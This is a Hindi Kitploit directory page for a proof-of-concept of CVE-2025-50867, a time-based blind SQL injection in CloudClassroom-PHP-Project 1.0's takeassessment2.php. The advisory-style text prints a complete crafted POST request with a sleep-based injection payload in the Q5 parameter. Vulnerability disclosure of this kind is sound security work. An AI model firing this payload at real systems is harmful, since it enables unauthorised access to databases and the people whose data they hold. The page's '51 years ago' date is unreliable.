Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50867 — CloudClassroom-PHP-Project 1.0 के takeassessment2.php एंडपॉइंट में टाइम-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो एक क्राफ्टेड POST अनुरोध के माध्यम से रिमोट शोषण का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/sacx-7/cve-2025-50867
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

CloudClassroom-PHP-Project 1.0 के takeassessment2.php एंडपॉइंट में टाइम-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो एक क्राफ्टेड POST अनुरोध के माध्यम से रिमोट शोषण का प्रदर्शन करता है।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CloudClassroom-PHP-Project 1.0 के takeassessment2.php एंडपॉइंट में SQL इंजेक्शन की कमज़ोरी मौजूद है, जहाँ Q5 POST पैरामीटर को बिना सैनिटाइज़ किए सीधे SQL स्टेटमेंट्स में डाला जाता है।


कमज़ोरी का प्रकार :

SQL इंजेक्शन


उत्पाद का विक्रेता :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


प्रभावित उत्पाद कोड बेस :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


प्रभावित घटक :

takeassessment2.php, Q5 POST पैरामीटर, SQL क्वेरी लॉजिक


हमले का प्रकार : रिमोट

हमले के वैक्टर :

इस कमज़ोरी का फायदा उठाने के लिए, हमलावर /CloudClassroom-PHP-Project-master/takeassessment2.php पर Q5 पैरामीटर में एक ऐसा पेलोड भेजता है जो SQL प्रोसेसिंग में समय विलंब पैदा करता है (ब्लाइंड टाइम-बेस्ड SQLi)।

POST अनुरोध:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= इससे प्रतिक्रिया में 6 सेकंड का विलंब होता है, जो कमज़ोरी की पुष्टि करता है।


संदर्भ :

https://owasp.org/www-community/attacks/SQL_Injection


खोजकर्ता : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

टूल डाउनलोड करें